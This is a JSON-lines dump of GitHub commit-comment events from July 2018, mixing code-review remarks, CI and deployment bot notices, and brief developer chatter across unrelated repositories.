{"id":"7938402104","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29643665,"position":null,"line":null,"path":null,"commit_id":"c772495d9857aaf5eb580b4ab125797859a390a7","created_at":"2018-07-09T15:31:35Z","updated_at":"2018-07-09T15:31:35Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#ci-254](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#ci-254).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-254-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-09T15:31:35Z"}
{"id":"7938403914","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29643669,"position":17,"line":199,"path":"code/drasil-example/Drasil/Sections/SpecificSystemDescription.hs","commit_id":"70ffb514b54821ffe1937af3ea567888c593d852","created_at":"2018-07-09T15:31:52Z","updated_at":"2018-07-09T15:31:52Z","author_association":"COLLABORATOR","body":"Upon looking into it again, realized that a separate label is alright in this scenario since one label is for the introductory contents (since \"paragraph should have a label\" as mentioned in Tuesday, June 19th's meeting) and the tables that should be passed in will have their own labels.\r\n"}},"created_at":"2018-07-09T15:31:52Z"}
{"id":"7938403978","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29643670,"position":66,"line":105,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-09T15:31:53Z","updated_at":"2018-07-09T15:31:53Z","author_association":"OWNER","body":"RE: \"give targets a chance to try re-entrance to be last\" \r\nI understand you're saying to transfer control as late in the contract as possible, and that this would reduce exposure ...somehow. Could you please expound a bit on how a re-entry might go? I'm trying to better grasp the order of events, and so, why altering this is an effective defense method."}},"created_at":"2018-07-09T15:31:53Z"}
{"id":"7938406537","type":"CommitCommentEvent","actor":{"login":"noximus"},"repo":{"name":"ceosabio/Name-that-tune"},"payload":{"comment":{"id":29643676,"position":27,"line":58,"path":"javascript/app.js","commit_id":"25c2f704bdb579fb73b9f08014677dee3d50c167","created_at":"2018-07-09T15:32:18Z","updated_at":"2018-07-09T15:32:18Z","author_association":"NONE","body":"is this a continuation of the previous lines?"}},"created_at":"2018-07-09T15:32:18Z"}
{"id":"7938409566","type":"CommitCommentEvent","actor":{"login":"mmoll"},"repo":{"name":"theforeman/foreman"},"payload":{"comment":{"id":29643683,"position":22,"line":181,"path":"app/models/subnet.rb","commit_id":"009e7bbd29f31c3750a8be47b4aecf5278c0db95","created_at":"2018-07-09T15:32:48Z","updated_at":"2018-07-09T15:32:48Z","author_association":"MEMBER","body":"@UXabre please open an issue in Redmine: https://projects.theforeman.org/issues"}},"created_at":"2018-07-09T15:32:48Z"}
{"id":"7938409865","type":"CommitCommentEvent","actor":{"login":"noximus"},"repo":{"name":"ceosabio/Name-that-tune"},"payload":{"comment":{"id":29643685,"position":28,"line":59,"path":"javascript/app.js","commit_id":"25c2f704bdb579fb73b9f08014677dee3d50c167","created_at":"2018-07-09T15:32:51Z","updated_at":"2018-07-09T15:32:51Z","author_association":"NONE","body":"this is still connected to the previous line.  The syntax is one long run on sentence.  "}},"created_at":"2018-07-09T15:32:51Z"}
{"id":"7938417785","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/bson-feedstock"},"payload":{"comment":{"id":29643696,"position":null,"line":null,"path":null,"commit_id":"2d5a29b2f6421858eada3f0cd3133a492897e110","created_at":"2018-07-09T15:34:06Z","updated_at":"2018-07-09T15:34:06Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @robmcmullen were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @robmcmullen were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T15:34:06Z"}
{"id":"7938418926","type":"CommitCommentEvent","actor":{"login":"tecnogestiones"},"repo":{"name":"tecnogestiones/tuplataforma"},"payload":{"comment":{"id":29643702,"position":null,"line":null,"path":null,"commit_id":"6e311a3ef2b5c52f007fbf093d3ece0d9140b347","created_at":"2018-07-09T15:34:17Z","updated_at":"2018-07-09T15:34:17Z","author_association":"OWNER","body":"j"}},"created_at":"2018-07-09T15:34:17Z"}
{"id":"7938422124","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29643711,"position":55,"line":1296,"path":"Source/Plugins/bsfRenderBeast/BsRenderCompositor.cpp","commit_id":"0c9e1d2d6aeed14a951eea9df443dd3667a9721c","created_at":"2018-07-09T15:34:48Z","updated_at":"2018-07-09T15:34:48Z","author_association":"CONTRIBUTOR","body":"I can't move in this case as I access this instance of the shared pointer after the call."}},"created_at":"2018-07-09T15:34:48Z"}
{"id":"7938422821","type":"CommitCommentEvent","actor":{"login":"n41270"},"repo":{"name":"n41270/SuperAdventure2"},"payload":{"comment":{"id":29643713,"position":39,"line":216,"path":"Player.cs","commit_id":"32d161727a50b3b1b5e0f2c7ec9d2981dc0ad4b8","created_at":"2018-07-09T15:34:55Z","updated_at":"2018-07-09T15:34:55Z","author_association":"OWNER","body":"need better filter when completion items have different level"}},"created_at":"2018-07-09T15:34:55Z"}
{"id":"7938428538","type":"CommitCommentEvent","actor":{"login":"Mike782"},"repo":{"name":"F0RIS/MultiOgarBlobPublic"},"payload":{"comment":{"id":29643726,"position":null,"line":null,"path":null,"commit_id":"e320ab3b62245ab34e8eb3c137f854a767598147","created_at":"2018-07-09T15:35:50Z","updated_at":"2018-07-09T15:35:50Z","author_association":"CONTRIBUTOR","body":"Some wear Diablo, and Isedat names are blocked. Their skins can't be used in-game, and when you type their names in chat you get the \"*\"."}},"created_at":"2018-07-09T15:35:50Z"}
{"id":"7938433897","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":29643737,"position":1,"line":1,"path":"mne/tests/test_sourcemorph.py","commit_id":"dd662ec5a87ab606240c15fbacc9afad42a330c4","created_at":"2018-07-09T15:36:39Z","updated_at":"2018-07-09T15:36:39Z","author_association":"MEMBER","body":"if file is called morph.py then test file should be called test_morph.py"}},"created_at":"2018-07-09T15:36:39Z"}
{"id":"7938435938","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":29643741,"position":36,"line":36,"path":"mne/tests/test_sourcemorph.py","commit_id":"dd662ec5a87ab606240c15fbacc9afad42a330c4","created_at":"2018-07-09T15:37:00Z","updated_at":"2018-07-09T15:37:00Z","author_association":"MEMBER","body":"can you read a precomputed stc files to save some testing time?"}},"created_at":"2018-07-09T15:37:00Z"}
{"id":"7938436139","type":"CommitCommentEvent","actor":{"login":"NBR-hugh"},"repo":{"name":"Vwan/sicp-lamp"},"payload":{"comment":{"id":29643742,"position":15,"line":772,"path":"ch1/1.3FormulatingAbstractionswithHigher-OrderProcedures.md","commit_id":"5e6f8dc058f2a28d685284124e590c5796239011","created_at":"2018-07-09T15:37:02Z","updated_at":"2018-07-09T15:37:02Z","author_association":"NONE","body":"@Vwan  急于交工急于炫耀是好事呐,总比憋了半天憋不出一个蛋来要好.总是思考自己的欠缺而没有可看到的实质进展,很容易引发负面情绪的. 从另一个角度看,快写发布你已经完成了,剩下是涉及慢改节奏的养成,对于一个问题的长考能力,以及工件的版本迭代管理"}},"created_at":"2018-07-09T15:37:02Z"}
{"id":"7938436468","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29643745,"position":6,"line":10,"path":"Source/Foundation/bsfCore/Scene/BsTransform.cpp","commit_id":"16f39aa6b0499caed7e6fde62ab808ede83f5f9e","created_at":"2018-07-09T15:37:06Z","updated_at":"2018-07-09T15:37:06Z","author_association":"CONTRIBUTOR","body":"Yep"}},"created_at":"2018-07-09T15:37:06Z"}
{"id":"7938439645","type":"CommitCommentEvent","actor":{"login":"agramfort"},"repo":{"name":"mne-tools/mne-python"},"payload":{"comment":{"id":29643750,"position":72,"line":72,"path":"mne/tests/test_sourcemorph.py","commit_id":"dd662ec5a87ab606240c15fbacc9afad42a330c4","created_at":"2018-07-09T15:37:36Z","updated_at":"2018-07-09T15:37:36Z","author_association":"MEMBER","body":"os.path.join"}},"created_at":"2018-07-09T15:37:36Z"}
{"id":"7938439781","type":"CommitCommentEvent","actor":{"login":"jedwards-AMD"},"repo":{"name":"RadeonOpenCompute/ROCm"},"payload":{"comment":{"id":29643752,"position":null,"line":null,"path":null,"commit_id":"fbcc9809de11eb13fff761ff5cfe5ca3fbd022dc","created_at":"2018-07-09T15:37:38Z","updated_at":"2018-07-09T15:37:38Z","author_association":"CONTRIBUTOR","body":"What version of ROCm do you have installed? The compute-firmware package was removed from the stack with the 1.7.0 release. However, I can understanding needing the ability to remove legacy packages. I can add it back into the master documentation."}},"created_at":"2018-07-09T15:37:38Z"}
{"id":"7938440251","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29643753,"position":5,"line":5,"path":"otus-persistence/src/test/java/br/org/otus/laboratory/participant/ParticipantLaboratoryDaoBeanTest.java","commit_id":"7c3f36782b6299dbdb513c840791fbd3c4f3fa45","created_at":"2018-07-09T15:37:43Z","updated_at":"2018-07-09T15:37:43Z","author_association":"MEMBER","body":"Remover linha com o import comentado."}},"created_at":"2018-07-09T15:37:43Z"}
{"id":"7938442603","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29643757,"position":14,"line":26,"path":"Source/Foundation/bsfCore/Scene/BsSceneManager.cpp","commit_id":"d2fe7c8b609a182ef2d10e23c2a5ad4638b662e8","created_at":"2018-07-09T15:38:06Z","updated_at":"2018-07-09T15:38:06Z","author_association":"CONTRIBUTOR","body":"That sounds good! Go for it."}},"created_at":"2018-07-09T15:38:06Z"}
{"id":"7938444875","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29643763,"position":66,"line":105,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-09T15:38:27Z","updated_at":"2018-07-09T15:38:27Z","author_association":"OWNER","body":"Also, to check my thinking, i don't see many cases where i'd actually write `revert` code then, since:\r\n1 - they happen automatically on transfer failure, and...\r\n2- ...indirectly on `require` statements, resulting in `REVERT` opcode\r\n3- i won't ever use `send` b/c will use `transfer` now\r\n4- i could `revert` on a `call` failure, but what is a case i would use `call` in a live contract? i've only found it useful while testing to mock a transfer and estimate gas, for instance (i suppose i could use it to get gas estimate, then dynamically set gas on subsequent `transfer` request?)"}},"created_at":"2018-07-09T15:38:27Z"}
{"id":"7938448477","type":"CommitCommentEvent","actor":{"login":"darindf"},"repo":{"name":"darindf/distributed"},"payload":{"comment":{"id":29643768,"position":null,"line":null,"path":null,"commit_id":"a82d9b8a2cdc7a962f1380307b671f98bce429f8","created_at":"2018-07-09T15:39:02Z","updated_at":"2018-07-09T15:39:02Z","author_association":"OWNER","body":"This seems to define the terms that are mapped between the 2 namespaces. The ones I moved in the config.yaml aren't covered. Perhaps this list needs to be amended to include those?\r\n\r\n```\r\naliases = {\r\n    'allowed-failures': 'distributed.scheduler.allowed-failures',\r\n    'bandwidth': 'distributed.scheduler.bandwidth',\r\n    'default-data-size': 'distributed.scheduler.default-data-size',\r\n    'transition-log-length': 'distributed.scheduler.transition-log-length',\r\n    'work-stealing': 'distributed.scheduler.work-stealing',\r\n    'worker-ttl': 'distributed.scheduler.worker-ttl',\r\n\r\n    'multiprocessing-method': 'distributed.worker.multiprocessing-method',\r\n    'use-file-locking': 'distributed.worker.use-file-locking',\r\n    'profile-interval': 'distributed.worker.profile.interval',\r\n    'profile-cycle-interval': 'distributed.worker.profile.cycle',\r\n    'worker-memory-target': 'distributed.worker.memory.target',\r\n    'worker-memory-spill': 'distributed.worker.memory.spill',\r\n    'worker-memory-pause': 'distributed.worker.memory.pause',\r\n    'worker-memory-terminate': 'distributed.worker.memory.terminate',\r\n\r\n    'heartbeat-interval': 'distributed.client.heartbeat',\r\n\r\n    'compression': 'distributed.comm.compression',\r\n    'connect-timeout': 'distributed.comm.timeouts.connect',\r\n    'tcp-timeout': 'distributed.comm.timeouts.tcp',\r\n    'default-scheme': 'distributed.comm.default-scheme',\r\n    'socket-backlog': 'distributed.comm.socket-backlog',\r\n    'recent-messages-log-length': 'distributed.comm.recent-messages-log-length',\r\n\r\n    'diagnostics-link': 'distributed.dashboard.link',\r\n    'bokeh-export-tool': 'distributed.dashboard.export-tool',\r\n\r\n    'tick-time': 'distributed.admin.tick.interval',\r\n    'tick-maximum-delay': 'distributed.admin.tick.limit',\r\n    'log-length': 'distributed.admin.log-length',\r\n    'log-format': 'distributed.admin.log-format',\r\n    'pdb-on-err': 'distributed.admin.pdb-on-err',\r\n}\r\n```"}},"created_at":"2018-07-09T15:39:02Z"}
{"id":"7938449098","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29643771,"position":5,"line":5,"path":"otus-persistence/src/test/java/br/org/otus/laboratory/participant/ParticipantLaboratoryDaoBeanTest.java","commit_id":"7c3f36782b6299dbdb513c840791fbd3c4f3fa45","created_at":"2018-07-09T15:39:08Z","updated_at":"2018-07-09T15:39:08Z","author_association":"MEMBER","body":"Na verdade a classe toda do teste não faz sentido existir, já que atualmente não está realizando nada."}},"created_at":"2018-07-09T15:39:08Z"}
{"id":"7938452241","type":"CommitCommentEvent","actor":{"login":"SpeedoWBT"},"repo":{"name":"Spirtix/android_device_huawei_HWPLK"},"payload":{"comment":{"id":29643775,"position":null,"line":null,"path":null,"commit_id":"50484a5a86b13f96e36e076d15f7b678def4b3c3","created_at":"2018-07-09T15:39:39Z","updated_at":"2018-07-09T15:39:39Z","author_association":"COLLABORATOR","body":"this one is very splendid , i've tried many hours without sucess .. thx  @T1mpp4"}},"created_at":"2018-07-09T15:39:39Z"}
{"id":"7938454587","type":"CommitCommentEvent","actor":{"login":"tkachpavlo1"},"repo":{"name":"tkachpavlo1/VeloProjectTest1"},"payload":{"comment":{"id":29643780,"position":null,"line":null,"path":null,"commit_id":"194915af5938c86ec75f950c6920814aa1bc06e9","created_at":"2018-07-09T15:40:02Z","updated_at":"2018-07-09T15:40:02Z","author_association":"OWNER","body":"zzz"}},"created_at":"2018-07-09T15:40:02Z"}
{"id":"7938455014","type":"CommitCommentEvent","actor":{"login":"webAnatoly"},"repo":{"name":"webAnatoly/understading_redux"},"payload":{"comment":{"id":29643781,"position":null,"line":null,"path":null,"commit_id":"64621772aa945100ca0cf8c5c0bee29b5d01ee38","created_at":"2018-07-09T15:40:07Z","updated_at":"2018-07-09T15:40:07Z","author_association":"OWNER","body":"В небольших проектах можно все actions хранить в одном файле. В больших лучше разделять, чтобы удобнее было дебажить, расширять и рефакторить. "}},"created_at":"2018-07-09T15:40:07Z"}
{"id":"7938457294","type":"CommitCommentEvent","actor":{"login":"smgallo"},"repo":{"name":"ubccr/xdmod"},"payload":{"comment":{"id":29643786,"position":5,"line":119,"path":"classes/ETL/Ingestor/CloudStateReconstructorTransformIngestor.php","commit_id":"240b3cc197314fbdde9f183eee14eca2648de86d","created_at":"2018-07-09T15:40:29Z","updated_at":"2018-07-09T15:40:29Z","author_association":"MEMBER","body":"Why is the last row discarded? This is not the case in general, correct?"}},"created_at":"2018-07-09T15:40:29Z"}
{"id":"7938457886","type":"CommitCommentEvent","actor":{"login":"sri1289"},"repo":{"name":"polarapu/batch32"},"payload":{"comment":{"id":29643788,"position":null,"line":null,"path":null,"commit_id":"4912e1b3631a821c5d6638cdf7754a6ba27dae84","created_at":"2018-07-09T15:40:35Z","updated_at":"2018-07-09T15:40:35Z","author_association":"COLLABORATOR","body":"hello"}},"created_at":"2018-07-09T15:40:35Z"}
{"id":"7938458085","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29643789,"position":17,"line":17,"path":"otus-rest/src/test/java/br/org/otus/laboratory/project/TransportationResourceTest.java","commit_id":"7c3f36782b6299dbdb513c840791fbd3c4f3fa45","created_at":"2018-07-09T15:40:37Z","updated_at":"2018-07-09T15:40:37Z","author_association":"MEMBER","body":"Remover linha com o _import_ comentado."}},"created_at":"2018-07-09T15:40:37Z"}
{"id":"7938463740","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29643808,"position":13,"line":154,"path":"Source/Foundation/bsfCore/Scene/BsSceneManager.h","commit_id":"d2fe7c8b609a182ef2d10e23c2a5ad4638b662e8","created_at":"2018-07-09T15:41:32Z","updated_at":"2018-07-09T15:41:32Z","author_association":"CONTRIBUTOR","body":"I don't like relying on aggregate initialization because I feel it's too easy to change field order in class and break it. Constructors feel like they're more statically safe (even though you can also change them it's probably more ingrained in programmer's minds that method parameter order matters).\r\n\r\nI'm also against anonymous types. They're fast to write but ultimately reduce readability for anyone trying to understand the code later."}},"created_at":"2018-07-09T15:41:32Z"}
{"id":"7938464837","type":"CommitCommentEvent","actor":{"login":"djaivaziusibmcom"},"repo":{"name":"djaivaziusibmcom/sample-cloud-native-toolchain-tutorial-20180706220104300"},"payload":{"comment":{"id":29643811,"position":null,"line":null,"path":null,"commit_id":"e6fa557c0472aaadb6a4222db2d495f69b618516","created_at":"2018-07-09T15:41:43Z","updated_at":"2018-07-09T15:41:43Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8404dd36-df44-4600-87c8-292bb5550add?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180706220104300\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/f3b05135-cb54-4e54-bd05-9116eb9eda8f?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180706220104300\") deployed [sample-cloud-native-toolchain-tutorial-20180706220104300](https://github.com/djaivaziusibmcom/sample-cloud-native-toolchain-tutorial-20180706220104300/releases/tag/deploy-ibm-yp-us-south-djaivazi-us.ibm.com-test-20180709-154142 \"deploy-ibm-yp-us-south-djaivazi-us.ibm.com-test-20180709-154142\") to [test](https://console.bluemix.net/apps/2cdf779d-7b3b-467c-94c8-94c031d28370?env_id=ibm:yp:us-south \"ibm:yp:us-south:djaivazi@us.ibm.com:test\"), including this commit"}},"created_at":"2018-07-09T15:41:43Z"}
{"id":"7938464906","type":"CommitCommentEvent","actor":{"login":"rissieri2000"},"repo":{"name":"rissieri2000/Loop_beta"},"payload":{"comment":{"id":29643812,"position":null,"line":null,"path":null,"commit_id":"d4708b56a2daebd79ee7a5903d1cfeb8384b9163","created_at":"2018-07-09T15:41:43Z","updated_at":"2018-07-09T15:41:43Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-09T15:41:43Z"}
{"id":"7938467586","type":"CommitCommentEvent","actor":{"login":"levitte"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29643823,"position":null,"line":null,"path":null,"commit_id":"973abf52304b454e8f2220a11aa8b6c6512c44fb","created_at":"2018-07-09T15:42:11Z","updated_at":"2018-07-09T15:42:11Z","author_association":"MEMBER","body":"#6680 should resolve the immediate issue."}},"created_at":"2018-07-09T15:42:11Z"}
{"id":"7938468252","type":"CommitCommentEvent","actor":{"login":"Vwan"},"repo":{"name":"Vwan/sicp-lamp"},"payload":{"comment":{"id":29643827,"position":4,"line":761,"path":"ch1/1.3FormulatingAbstractionswithHigher-OrderProcedures.md","commit_id":"5e6f8dc058f2a28d685284124e590c5796239011","created_at":"2018-07-09T15:42:17Z","updated_at":"2018-07-09T15:42:17Z","author_association":"OWNER","body":"@NBR-hugh 是我这个文件名1.3FormulatingAbstractionswithHigher-OrderProcedures.md 太长了吗？我也感觉有点长哈"}},"created_at":"2018-07-09T15:42:17Z"}
{"id":"7938470371","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29643831,"position":null,"line":null,"path":null,"commit_id":"a2d876b4df5a1b6da045bcd1f501d164a2429806","created_at":"2018-07-09T15:42:37Z","updated_at":"2018-07-09T15:42:37Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2970 of 2971 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-09T15:42:37Z"}
{"id":"7938473003","type":"CommitCommentEvent","actor":{"login":"Fkralbukra"},"repo":{"name":"Fkralbukra/my-travel-plans"},"payload":{"comment":{"id":29643836,"position":55,"line":55,"path":"css/app.css","commit_id":"5f25541b9d05f762536c3b615057dd7019f09e3b","created_at":"2018-07-09T15:43:03Z","updated_at":"2018-07-09T15:43:03Z","author_association":"OWNER","body":".destination:hover h2 {\r\ntransform: rotate(0deg);\r\n}"}},"created_at":"2018-07-09T15:43:03Z"}
{"id":"7938475205","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29643841,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-09T15:43:23Z","updated_at":"2018-07-09T15:43:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T15:43:23Z"}
{"id":"7938478635","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29643846,"position":1,"line":null,"path":"1531151032.61/github_test.txt","commit_id":"e5ecd1dc454579f3c052dcaa63592b3baa0659c6","created_at":"2018-07-09T15:43:55Z","updated_at":"2018-07-09T15:43:55Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-09T15:43:55Z"}
{"id":"7938481918","type":"CommitCommentEvent","actor":{"login":"Vwan"},"repo":{"name":"Vwan/sicp-lamp"},"payload":{"comment":{"id":29643852,"position":15,"line":772,"path":"ch1/1.3FormulatingAbstractionswithHigher-OrderProcedures.md","commit_id":"5e6f8dc058f2a28d685284124e590c5796239011","created_at":"2018-07-09T15:44:25Z","updated_at":"2018-07-09T15:44:25Z","author_association":"OWNER","body":"@NBR-hugh 从你说的这个角度看，也对哦，早点出屎稿，以及阳老师的快写慢改。看问题还是得多个角度，受你启发了:-)"}},"created_at":"2018-07-09T15:44:25Z"}
{"id":"7938485949","type":"CommitCommentEvent","actor":{"login":"djaivaziusibmcom"},"repo":{"name":"djaivaziusibmcom/sample-cloud-native-toolchain-tutorial-20180706220104300"},"payload":{"comment":{"id":29643869,"position":null,"line":null,"path":null,"commit_id":"e6fa557c0472aaadb6a4222db2d495f69b618516","created_at":"2018-07-09T15:45:03Z","updated_at":"2018-07-09T15:45:03Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8404dd36-df44-4600-87c8-292bb5550add?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180706220104300\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/f3b05135-cb54-4e54-bd05-9116eb9eda8f?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180706220104300\") deployed [sample-cloud-native-toolchain-tutorial-20180706220104300](https://github.com/djaivaziusibmcom/sample-cloud-native-toolchain-tutorial-20180706220104300/releases/tag/deploy-ibm-yp-us-south-djaivazi-us.ibm.com-prod-20180709-154503 \"deploy-ibm-yp-us-south-djaivazi-us.ibm.com-prod-20180709-154503\") to [prod](https://console.bluemix.net/apps/0b6e3282-c637-4f5d-a607-cff71f77e8d5?env_id=ibm:yp:us-south \"ibm:yp:us-south:djaivazi@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-09T15:45:03Z"}
{"id":"7938486078","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"laldon/Ethereal"},"payload":{"comment":{"id":29643870,"position":null,"line":null,"path":null,"commit_id":"a3ac9388b52b70d496e400a4bdfe9a36d8b88122","created_at":"2018-07-09T15:45:05Z","updated_at":"2018-07-09T15:45:05Z","author_association":"NONE","body":"LALDON YOU ARE OUR ONLY HOPE"}},"created_at":"2018-07-09T15:45:05Z"}
{"id":"7938500246","type":"CommitCommentEvent","actor":{"login":"b06sd"},"repo":{"name":"b06sd/courier_project"},"payload":{"comment":{"id":29643906,"position":null,"line":null,"path":null,"commit_id":"126cd69a8e758b38bbb2961c365b685c7b5e972a","created_at":"2018-07-09T15:47:17Z","updated_at":"2018-07-09T15:47:17Z","author_association":"OWNER","body":"Okay sir, all correct."}},"created_at":"2018-07-09T15:47:17Z"}
{"id":"7938500594","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29643907,"position":null,"line":null,"path":null,"commit_id":"a2d876b4df5a1b6da045bcd1f501d164a2429806","created_at":"2018-07-09T15:47:21Z","updated_at":"2018-07-09T15:47:21Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2d876b4df5a1b6da045bcd1f501d164a2429806-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-09T15:47:21Z"}
{"id":"7938508681","type":"CommitCommentEvent","actor":{"login":"desyati"},"repo":{"name":"desyati/desyati.github.io"},"payload":{"comment":{"id":29643928,"position":1,"line":1,"path":"CNAME","commit_id":"f00e03e66d8536f4c3accd02a3331c9c1b39e4af","created_at":"2018-07-09T15:48:39Z","updated_at":"2018-07-09T15:48:39Z","author_association":"OWNER","body":"success"}},"created_at":"2018-07-09T15:48:39Z"}
{"id":"7938509065","type":"CommitCommentEvent","actor":{"login":"artembilan"},"repo":{"name":"spring-cloud/spring-cloud-gcp"},"payload":{"comment":{"id":29643930,"position":29,"line":206,"path":"spring-cloud-gcp-pubsub/src/main/java/org/springframework/cloud/gcp/pubsub/PubSubAdmin.java","commit_id":"d3dea6a125e7d475c8a529b3f45f5a5be68a3c72","created_at":"2018-07-09T15:48:43Z","updated_at":"2018-07-09T15:48:43Z","author_association":"CONTRIBUTOR","body":"If you do string concatenation in assert messages, you should consider to use a `Supplier<String>` variant for asserts, e.g. for this one:\r\n```\r\n/**\r\n\t * Assert a boolean expression, throwing an {@code IllegalArgumentException}\r\n\t * if the expression evaluates to {@code false}.\r\n\t * <pre class=\"code\">\r\n\t * Assert.isTrue(i &gt; 0, () -&gt; \"The value '\" + i + \"' must be greater than zero\");\r\n\t * </pre>\r\n\t * @param expression a boolean expression\r\n\t * @param messageSupplier a supplier for the exception message to use if the\r\n\t * assertion fails\r\n\t * @throws IllegalArgumentException if {@code expression} is {@code false}\r\n\t * @since 5.0\r\n\t */\r\n\tpublic static void isTrue(boolean expression, Supplier<String> messageSupplier) {\r\n```\r\n\r\nThe point is do not do string concatenation until assertion fail."}},"created_at":"2018-07-09T15:48:43Z"}
